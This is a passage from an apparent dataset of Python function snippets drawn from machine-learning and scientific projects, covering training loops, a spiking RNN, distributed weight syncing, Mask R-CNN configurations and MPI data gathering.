LOG.info(\"--------------DJDD---------------------\")\n LOG.info(\"Average, PSNR = %.1f dB, MSE = %.5f\", psnrdjdd, msedjdd)\n pdb.set_trace()\n pdf.to_csv(\"/workspace/presentation_compare.csv\")", "def update_network(self):\n\n device = torch.device(\"cpu\")\n self.model = ProLoNet(input_dim=13,\n weights=None,\n comparators=None,\n leaves=32,\n output_dim=1,\n bayesian_embedding_dim=8,\n alpha=1.5,\n use_gpu=False,\n vectorized=True,\n is_value=True).to(device)\n\n self.embedding_optimizer = torch.optim.RMSprop([{'params': self.model.bayesian_embedding.parameters()}], lr=.1)\n self.embedding_list = [torch.ones(3) * 1 / 3 for i in range(2000)]\n self.opt = torch.optim.RMSprop(\n [{'params': list(self.model.parameters())[:-1]}, {'params': self.model.bayesian_embedding.parameters(), 'lr': .01}], lr=.01)\n\n criterion = torch.nn.BCELoss()\n\n n_epochs = 4000 + self.global_schedule_num * 3\n for epoch in range(n_epochs):\n which_schedule = np.random.randint(len(self.data_so_far))\n timestep_within_schedule = np.random.randint(len(self.teacher_actions[which_schedule]))\n\n index_within_network_state = timestep_within_schedule * 20\n timestep_data_from_agg = self.data_so_far[which_schedule][index_within_network_state:index_within_network_state+20]\n task = self.teacher_actions[which_schedule][timestep_within_schedule]\n # set the embedding\n self.model.set_bayesian_embedding(self.embedding_list[which_schedule].clone())\n # update loop\n\n phi_i_num = task\n phi_i = self.get_features_from_timestep_data_from_agg(timestep_data_from_agg, phi_i_num)\n phi_i_numpy = np.asarray(phi_i)\n loss_counter = 0\n # iterate over pairwise comparisons\n for counter in range(0, 0 + 20):\n if counter == phi_i_num:\n continue\n else:\n phi_j = self.get_features_from_timestep_data_from_agg(timestep_data_from_agg, counter)\n phi_j_numpy = np.asarray(phi_j)\n feature_input = phi_i_numpy - phi_j_numpy\n\n if self.use_gpu:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)).cuda())\n label = Variable(torch.Tensor(torch.ones((1, 1))).cuda())\n else:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)))\n label = Variable(torch.Tensor(torch.ones((1, 1))))\n sig = torch.nn.Sigmoid()\n output = sig(self.model(feature_input))\n loss = criterion(output, label)\n # prepare optimizer, compute gradient, update params\n loss_counter += loss.item()\n self.opt.zero_grad()\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(self.model.parameters(), 0.5)\n self.opt.step()\n\n for counter in range(0, 0 + 20):\n if counter == phi_i_num:\n continue\n else:\n phi_j = self.get_features_from_timestep_data_from_agg(timestep_data_from_agg, counter)\n phi_j_numpy = np.asarray(phi_j)\n feature_input = phi_j_numpy - phi_i_numpy\n\n if self.use_gpu:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)).cuda())\n label = Variable(torch.Tensor(torch.zeros((1, 1))).cuda())\n else:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)))\n label = Variable(torch.Tensor(torch.zeros((1, 1))))\n sig = torch.nn.Sigmoid()\n output = sig(self.model.forward(feature_input))\n\n self.opt.zero_grad()\n loss = criterion(output, label)\n loss_counter += loss.item()\n\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(self.model.parameters(), 0.5)\n self.opt.step()\n self.loss_array.append(loss_counter / 38)\n self.embedding_list[which_schedule] = torch.Tensor(self.model.get_bayesian_embedding().detach().cpu().numpy()).clone() # very ugly", "def rnn_cell_loop(self):\n\n\t\t# Set up initial state\n\t\tself.h_out = [tf.zeros([par['batch_size'],par['n_hidden']])]\t\t\t# Spike\n\t\tself.h = tf.ones([par['batch_size'],par['n_hidden']])\t\t\t\t\t# State\n\t\tself.h *= 0.1 if par['cell_type'] == 'rate' else par[par['cell_type']]['V_r']\n\t\tself.h = [self.h]\n\t\tadapt = par['w_init']*tf.ones([par['batch_size'],par['n_hidden']])\n\n\t\tsyn_x = par['syn_x_init']*tf.ones([par['batch_size'], par['n_hidden']]) if par['use_stp'] else None\n\t\tsyn_u = par['syn_u_init']*tf.ones([par['batch_size'], par['n_hidden']]) if par['use_stp'] else None\n\n\t\t# Apply the EI mask to the recurrent weights\n\t\tself.W_rnn_effective = par['EI_matrix'] @ tf.nn.relu(self.var_dict['W_rnn'])\n\n\t\t# Set up latency buffer if being used\n\t\tif par['use_latency']:\n\t\t\tself.state_buffer = [tf.zeros([par['batch_size'], par['n_hidden']]) for t in range(par['latency_max'])]\n\t\t\tself.state_buffer = deque(self.state_buffer)\n\t\t\tself.W_rnn_latency = self.W_rnn_effective[tf.newaxis,...] * par['latency_mask']\n\t\t\tself.lat_spike_shape = tf.ones([par['latency_max'], 1, 1])\n\n\t\t# Set up output record\n\t\tself.output = []\n\t\tself.syn_x = []\n\t\tself.syn_u = []\n\n\t\ty = 0.\n\t\tfor t in range(par['num_time_steps']):\n\t\t\tself.t = t \t\t# For latency calculations\n\n\t\t\tif par['cell_type'] == 'rate':\n\t\t\t\traise Exception('Rate cell not yet implemented.')\n\t\t\telif par['cell_type'] == 'adex':\n\t\t\t\tif t < 10:\n\t\t\t\t\tspike, state, adapt, syn_x, syn_u = self.AdEx_cell(tf.zeros_like(self.h_out[-1]), self.h[-1], \\\n\t\t\t\t\t\tadapt, self.input_data[t], syn_x, syn_u)\n\t\t\t\telse:\n\t\t\t\t\tspike, state, adapt, syn_x, syn_u = self.AdEx_cell(self.h_out[-10], self.h[-1], \\\n\t\t\t\t\t\tadapt, self.input_data[t], syn_x, syn_u)\n\t\t\t\ty = 0.95*y + 0.05*(spike @ self.var_dict['W_out'] + self.var_dict['b_out'])\n\n\t\t\t\tself.h_out.append(spike)\n\t\t\t\tself.h.append(state)\n\t\t\t\tself.output.append(y)\n\t\t\t\tself.syn_x.append(syn_x)\n\t\t\t\tself.syn_u.append(syn_u)\n\n\t\t\telif par['cell_type'] == 'lif':\n\t\t\t\tspike, state, adapt, syn_x, syn_u = self.LIF_cell(self.h_out[-1], self.h[-1], adapt, self.input_data[t], syn_x, syn_u)\n\t\t\t\ty = 0.95*y + 0.05*spike @ self.var_dict['W_out'] + 0.*self.var_dict['b_out']\n\n\t\t\t\tself.h_out.append(spike)\n\t\t\t\tself.h.append(state)\n\t\t\t\tself.output.append(y)\n\n\t\t# Stack records\n\t\tself.output = tf.stack(self.output, axis=0)\n\t\tself.h = tf.stack(self.h, axis=0)\n\t\tself.h_out = tf.stack(self.h_out, axis=0)\n\t\tself.syn_x = tf.stack(self.syn_x, axis=0)\n\t\tself.syn_u = tf.stack(self.syn_u, axis=0)", "def compute_status(self, net_output, gts):\n # setting prob_list and probs as None\n self.probs = None\n self.prob_list = None\n\n logit_list = net_output[0]\n self.compute_top1_accuracy(logit_list, gts)\n self.compute_oracle_accuracy(logit_list, gts)\n self.compute_confusion_matrix(logit_list, gts)\n\n self.attach_predictions()\n self.attach_assignments(gts)", "def process(self, sess):\n global send_counter\n \n #sess.run(self.sync) # copy weights from shared to local\n rollout = self.pull_batch_from_queue()\n batch = process_rollout(rollout, gamma=0.99, lambda_=1.0)\n\n should_compute_summary = self.task == 0 and self.local_steps % 11 == 0\n\n if should_compute_summary:\n fetches = [self.summary_op, self.train_op]\n else:\n fetches = [self.train_op]\n\n\n feed_dict = {\n self.local_network.x: batch.si,\n self.ac: batch.a,\n self.adv: batch.adv,\n self.r: batch.r,\n self.local_network.state_in[0]: batch.features[0],\n self.local_network.state_in[1]: batch.features[1],\n }\n\n # Get current trainable variables\n # This is trainable variables\n fetched = sess.run(fetches, feed_dict=feed_dict)\n\n\n if self.num_workers > 1:\n sys.stdout.write('\\r' + str(self.local_steps))\n if self.local_steps % 100 == 0:\n global var0\n global var1\n var1 = sess.run(self.local_network.var_list) # After training\n if var0 != None:\n var_diff = [a - b for (a,b) in zip(var1, var0)]\n var_diff_data = pickle.dumps(var_diff, -1)\n print('Sync weights')\n self.msg_sent = socket_util.socket_send_data_chucks(self.sock, var_diff_data, self.mcast_destination, self.msg_sent)\n var0 = sess.run(self.local_network.var_list) # A list of numpy array\n\n # Handle each message in the socket queue\n while not self.inc_msg_q.empty():\n print('Apply remote gradients')\n # Process received grads_and_vars from other peers\n remote_var_diff_data = self.inc_msg_q.get(False)\n remote_var_diff = pickle.loads(remote_var_diff_data)\n\n add_op = [a+b for (a,b) in zip(self.local_network.var_list, remote_var_diff)]\n sess.run(add_op)\n\n if should_compute_summary:\n self.summary_writer.add_summary(tf.Summary.FromString(fetched[0]))\n self.summary_writer.flush()\n self.local_steps += 1", "def __call__(self, initial_state, previous_alignments):\n with tf.variable_scope(None, \"rnn_score_attention\", [initial_state]):\n score, final_state = rnn_score(initial_state, self._keys, self._cell, self._memory_sequence_length)\n alignments = self._probability_fn(score, previous_alignments)\n return alignments, final_state", "def main(Args):\n norm = [1.9844158727667542, 413.83759806375525,\n 51.2789974336363, 1038.4760551905683]\n input_pull = False\n input_model_mapping = False\n max_number = 2\n count = 40000\n catalog_name = os.path.join(DATA_PATH, 'OneDegSq.fits')\n # Define parameters for mrcnn model with btk here\n resid_model = btk_utils.Resid_btk_model(\n Args.model_name, Args.model_path, MODEL_DIR, training=True,\n images_per_gpu=4, validation_for_training=True)\n # Load parameters for dataset and load model\n resid_model.config.WEIGHT_DECAY = 0.001\n resid_model.config.STEPS_PER_EPOCH = 1000\n resid_model.config.VALIDATION_STEPS = 20\n sampling_function = None\n layers = 'all'\n if Args.model_name == 'model1':\n resid_model.config.BACKBONE = 'resnet41'\n elif Args.model_name == 'model2':\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model3':\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model4':\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model5':\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet35'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model4_large':\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = '4+' # '3+'\n elif Args.model_name == 'model6':\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 51.2789974336363, 1038.4760551905683]\n input_pull = True\n elif Args.model_name == 'model7':\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model8': # stretch = 0.1, Q = 3\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model9': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1., 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_again': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_again2': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_again3': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_2': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0., 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model11': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1., 0., 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model11_2': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1., 0., 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model12': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n max_number = 6\n elif Args.model_name == 'model12_again': # stretch = 2000, Q = 0.5 # larger learning rate\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n max_number = 10 # changed from 6 to 10 for run 4\n elif Args.model_name == 'model12_again2': # stretch = 2000, Q = 0.5 # larger learning rate val set reduced to 10\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n max_number = 6\n resid_model.config.VALIDATION_STEPS = 10\n else:\n raise AttributeError(\"model not found\", Args.model_name)\n print(\"Train in model:\", Args.model_name)\n resid_model.config.display()\n resid_model.make_resid_model(catalog_name, count=count,\n max_number=max_number, augmentation=True,\n norm_val=norm, input_pull=input_pull,\n sampling_function=sampling_function,\n input_model_mapping=input_model_mapping)\n learning_rate = resid_model.config.LEARNING_RATE/10.\n np.random.seed(Args.epochs)\n history = resid_model.model.train(resid_model.dataset,\n resid_model.dataset_val,\n learning_rate=learning_rate,\n epochs=Args.epochs,\n layers=layers)\n name = Args.model_name + '_run2'\n with open(name + \".dill\", 'wb') as handle:\n dill.dump(history.history, handle)\n learning_rate = resid_model.config.LEARNING_RATE/10.\n np.random.seed(Args.epochs + 10)\n history = resid_model.model.train(resid_model.dataset,\n resid_model.dataset_val,\n learning_rate=learning_rate,\n epochs=Args.epochs+10,\n layers=layers)\n name = Args.model_name + '_run3'\n with open(name + \".dill\", 'wb') as handle:\n dill.dump(history.history, handle)", "def worker(self, gpu_id: int):\n if self.seed is not None:\n make_deterministic(self.seed)\n self.current_rank = self.rank\n if self.distributed:\n if self.multiprocessing:\n # For multiprocessing distributed training, rank needs to be the\n # global rank among all the processes\n self.current_rank = self.rank * self.ngpus_per_node + gpu_id\n dist.init_process_group(\n backend=self.dist_backend,\n init_method=self.dist_url,\n world_size=self.world_size,\n rank=self.current_rank\n )\n # set up process logger\n self.logger = logging.getLogger(\"worker_rank_{}\".format(self.current_rank))\n self.logger.propagate = False\n handler = QueueHandler(self.logger_queue)\n self.logger.addHandler(handler)\n self.logger.setLevel(logging.INFO)\n\n # only write in master process\n if self.current_rank == 0:\n self.tb_writer = self.tb_writer_constructor()\n\n self.logger.info(\n \"Use GPU: %d for training, current rank: %d\",\n gpu_id,\n self.current_rank\n )\n # get dataset\n train_dataset = get_dataset(\n self.global_cfg[\"dataset\"][\"name\"],\n self.global_cfg[\"dataset\"][\"root\"],\n split=\"train\"\n )\n val_dataset = get_dataset(\n self.global_cfg[\"dataset\"][\"name\"],\n self.global_cfg[\"dataset\"][\"root\"],\n split=\"val\"\n )\n # create model\n self.model = get_model(\n model_name=self.global_cfg[\"model\"][\"name\"],\n num_classes=self.global_cfg[\"dataset\"][\"n_classes\"]\n )\n\n self.device = torch.device(\"cuda:{}\".format(gpu_id))\n self.model.to(self.device)\n\n batch_size = self.global_cfg[\"training\"][\"batch_size\"]\n n_workers = self.global_cfg[\"training\"][\"num_workers\"]\n if self.distributed:\n batch_size = int(batch_size / self.ngpus_per_node)\n n_workers = int((n_workers + self.ngpus_per_node - 1) / self.ngpus_per_node)\n if self.global_cfg[\"training\"][\"sync_bn\"]:\n self.model = SyncBatchNorm.convert_sync_batchnorm(self.model)\n self.model = DistributedDataParallel(self.model, device_ids=[gpu_id])\n self.logger.info(\"batch_size: {}, workers: {}\".format(batch_size, n_workers))\n\n # define loss function (criterion) and optimizer\n self.loss_fn = CrossEntropyLoss().to(self.device)\n\n optimizer_cls = get_optimizer(self.global_cfg[\"training\"][\"optimizer\"])\n optimizer_params = copy.deepcopy(self.global_cfg[\"training\"][\"optimizer\"])\n optimizer_params.pop(\"name\")\n self.optimizer: Optimizer = optimizer_cls(self.model.parameters(), **optimizer_params)\n self.logger.info(\"Loaded optimizer:\\n%s\", self.optimizer)\n\n # scheduler\n self.scheduler = get_scheduler(self.optimizer, self.global_cfg[\"training\"][\"lr_schedule\"])\n\n if self.distributed:\n train_sampler = DistributedSampler(\n train_dataset,\n shuffle=True,\n drop_last=True\n )\n val_sampler = DistributedSampler(\n val_dataset,\n shuffle=False\n )\n else:\n train_sampler = RandomSampler(train_dataset)\n val_sampler = SequentialSampler(val_dataset)\n\n train_loader = DataLoader(\n train_dataset,\n batch_size=batch_size,\n num_workers=n_workers,\n pin_memory=True,\n sampler=train_sampler\n )\n\n self.val_loader = DataLoader(\n val_dataset,\n batch_size=batch_size,\n num_workers=n_workers,\n pin_memory=True,\n sampler=val_sampler\n )\n self.logger.info(\n \"Load dataset done\\nTraining: %d imgs, %d batchs\\nEval: %d imgs, %d batchs\",\n len(train_dataset),\n len(train_loader),\n len(val_dataset),\n len(self.val_loader)\n )\n iter_generator = make_iter_dataloader(train_loader)\n\n while self.iter < self.global_cfg[\"training\"][\"train_iters\"]:\n img, label = next(iter_generator)\n self.train_iter(img, label)\n\n def is_val():\n p1 = self.iter != 0\n p2 = (self.iter + 1) % self.global_cfg[\"training\"][\"val_interval\"] == 0\n p3 = self.iter == self.global_cfg[\"training\"][\"train_iters\"] - 1\n return (p1 and p2) or p3\n\n # have a validation\n if is_val():\n self.validate()\n # end one iteration\n self.iter += 1", "def update(self, batch):\n if self.opt['cuda']:\n inputs = [Variable(torch.LongTensor(b).cuda()) for b in batch[:3]]\n subj_start_binary = Variable(torch.LongTensor(batch[5]).cuda()).float()\n subj_end_binary = Variable(torch.LongTensor(batch[6]).cuda()).float()\n obj_start_relation = Variable(torch.LongTensor(batch[7]).cuda())\n obj_end_relation = Variable(torch.LongTensor(batch[8]).cuda())\n subj_start_type = Variable(torch.LongTensor(batch[9]).cuda())\n subj_end_type = Variable(torch.LongTensor(batch[10]).cuda())\n obj_start_type = Variable(torch.LongTensor(batch[11]).cuda())\n obj_end_type = Variable(torch.LongTensor(batch[12]).cuda())\n nearest_subj_start_position_for_each_token = Variable(torch.LongTensor(batch[13]).cuda())\n distance_to_nearest_subj_start = Variable(torch.LongTensor(batch[14]).cuda())\n distance_to_subj = Variable(torch.LongTensor(batch[15]).cuda())\n nearest_obj_start_position_for_each_token = Variable(torch.LongTensor(batch[3]).cuda())\n distance_to_nearest_obj_start = Variable(torch.LongTensor(batch[4]).cuda())\n else:\n inputs = [Variable(torch.LongTensor(b)) for b in batch[:4]]\n subj_start_label = Variable(torch.LongTensor(batch[4])).float()\n subj_end_label = Variable(torch.LongTensor(batch[5])).float()\n obj_start_label = Variable(torch.LongTensor(batch[6]))\n obj_end_label = Variable(torch.LongTensor(batch[7]))\n subj_type_start_label = Variable(torch.LongTensor(batch[8]))\n subj_type_end_label = Variable(torch.LongTensor(batch[9]))\n obj_type_start_label = Variable(torch.LongTensor(batch[10]))\n obj_type_end_label = Variable(torch.LongTensor(batch[11]))\n subj_nearest_start_for_each = Variable(torch.LongTensor(batch[12]))\n subj_distance_to_start = Variable(torch.LongTensor(batch[13]))\n \n \n mask = (inputs[0].data>0).float()\n # step forward\n self.model.train()\n self.optimizer.zero_grad()\n\n \n subj_start_logits, subj_end_logits, obj_start_logits, obj_end_logits = self.model(inputs, distance_to_subj)\n\n subj_start_loss = self.obj_criterion(subj_start_logits.view(-1, self.opt['num_subj_type']+1), subj_start_type.view(-1).squeeze()).view_as(mask)\n subj_start_loss = torch.sum(subj_start_loss.mul(mask.float()))/torch.sum(mask.float())\n \n subj_end_loss = self.obj_criterion(subj_end_logits.view(-1, self.opt['num_subj_type']+1), subj_end_type.view(-1).squeeze()).view_as(mask)\n subj_end_loss = torch.sum(subj_end_loss.mul(mask.float()))/torch.sum(mask.float())\n \n obj_start_loss = self.obj_criterion(obj_start_logits.view(-1, self.opt['num_class']+1), obj_start_relation.view(-1).squeeze()).view_as(mask)\n obj_start_loss = torch.sum(obj_start_loss.mul(mask.float()))/torch.sum(mask.float())\n \n obj_end_loss = self.obj_criterion(obj_end_logits.view(-1, self.opt['num_class']+1), obj_end_relation.view(-1).squeeze()).view_as(mask)\n obj_end_loss = torch.sum(obj_end_loss.mul(mask.float()))/torch.sum(mask.float())\n \n loss = self.opt['subj_loss_weight']*(subj_start_loss + subj_end_loss) + (obj_start_loss + obj_end_loss)\n \n # backward\n loss.backward()\n # torch.nn.utils.clip_grad_norm(self.model.parameters(), self.opt['max_grad_norm'])\n self.optimizer.step()\n loss_val = loss.data.item()\n return loss_val", "def gather_ps(rank, size, comm, k_allmodels, P21_allmodels, PHII_allmodels,\n first_snap_allmodels, last_snap_allmodels):\n\n def generate_tag(rank):\n tag = int(rank*100)\n\n return tag\n\n # Rank 0 will gather the wavenumber bins/power spectra from all other\n # ranks. \n if rank == 0:\n k_master = []\n P21_master = []\n PHII_master = []\n\n # Go through each model. \n for model_number in range(len(k_allmodels)):\n\n k_master.append([])\n P21_master.append([])\n PHII_master.append([])\n\n model_k = k_allmodels[model_number]\n model_P21 = P21_allmodels[model_number]\n model_PHII = PHII_allmodels[model_number]\n\n num_snaps = last_snap_allmodels[model_number] - \\\n first_snap_allmodels[model_number]\n rank_count = 0\n my_count = 0\n\n # Then go through each snapshot.\n # In the main data loop (``generate_data()``) the snapshots are\n # scatter sequentially. Hence when we gather, we get snap0 from\n # rank 0, snap1 from rank 1 etc. So we increase rank_count for each\n # snapshot and then reset it when we reach `size`.\n for snap_idx in range(num_snaps):\n\n if rank_count == 0:\n this_k = model_k[my_count] \n this_P21 = model_P21[my_count] \n this_PHII = model_PHII[my_count] \n my_count += 1\n else:\n # Each rank will use a unique tag.\n tag = generate_tag(rank_count) \n\n # Then the tag is offset for each data array. \n this_k = comm.recv(source = rank_count,\n tag = tag)\n this_P21 = comm.recv(source = rank_count,\n tag = tag+1)\n this_PHII = comm.recv(source = rank_count,\n tag = tag+2)\n\n # Now we have the data, append it to the master.\n k_master[model_number].append(this_k)\n P21_master[model_number].append(this_P21)\n PHII_master[model_number].append(this_PHII)\n\n rank_count += 1\n if rank_count == size:\n rank_count = 0\n\n # Snapshot Loop.\n # Model Loop.\n\n return k_master, P21_master, PHII_master\n\n else:\n\n # For all other ranks, go through the power spectra it calculated and\n # send it back to the root rank.\n for model_number in range(len(k_allmodels)):\n for idx in range(len(P21_allmodels[model_number])):\n\n tag = generate_tag(rank) \n\n k_this_idx = k_allmodels[model_number][idx]\n P21_this_idx = P21_allmodels[model_number][idx]\n PHII_this_idx = PHII_allmodels[model_number][idx]\n\n comm.send(k_this_idx, dest = 0, tag = tag)\n comm.send(P21_this_idx, dest = 0, tag = tag+1)\n comm.send(PHII_this_idx, dest = 0, tag = tag+2)\n\n # Non-zero ranks return junk.\n return None, None, None", "def __init__(self,\n num_class=2,\n layer_nums=(3, 5, 5),\n layer_strides=(2, 2, 2),\n num_filters=(128, 128, 256),\n upsample_strides=(1, 2, 4),\n num_upsample_filters=(256, 256, 256),\n num_input_features=128,\n num_anchor_per_loc=2,\n use_groupnorm=False,\n num_groups=32,\n box_code_size=7,\n num_direction_bins=2):\n super(RPN, self).__init__()\n self._num_anchor_per_loc = num_anchor_per_loc\n self._box_code_size=box_code_size\n self._num_class=num_class\n self._num_direction_bins=num_direction_bins\n assert len(layer_nums) == 3\n assert len(layer_strides) == len(layer_nums)\n assert len(num_filters) == len(layer_nums)\n assert len(upsample_strides) == len(layer_nums)\n assert len(num_upsample_filters) == len(layer_nums)\n upsample_strides=[int(i) for i in upsample_strides]\n\n factors = []\n for i in range(len(layer_nums)):\n assert int(np.prod(\n layer_strides[:i + 1])) % upsample_strides[i] == 0\n factors.append(\n np.prod(layer_strides[:i + 1]) // upsample_strides[i])\n assert all([x == factors[0] for x in factors])\n\n # note that when stride > 1, conv2d with same padding isn't\n # equal to pad-conv2d. we should use pad-conv2d.\n block2_input_filters = num_filters[0]\n if use_groupnorm:\n BatchNorm2d = change_default_args(\n num_groups=num_groups, eps=1e-3)(GroupNorm)\n else:\n BatchNorm2d = change_default_args(\n eps=1e-3, momentum=0.01)(nn.BatchNorm2d)\n\n self.block1 = Sequential(\n nn.ZeroPad2d(1),\n nn.Conv2d(num_input_features, num_filters[0], 3,\n stride=layer_strides[0],bias=False),\n BatchNorm2d(num_filters[0]),\n nn.ReLU(),)\n for i in range(layer_nums[0]):\n self.block1.add(\n nn.Conv2d(num_filters[0], num_filters[0], 3,padding=1,bias=False))\n self.block1.add(BatchNorm2d(num_filters[0]))\n self.block1.add(nn.ReLU())\n self.deconv1 = Sequential(\n 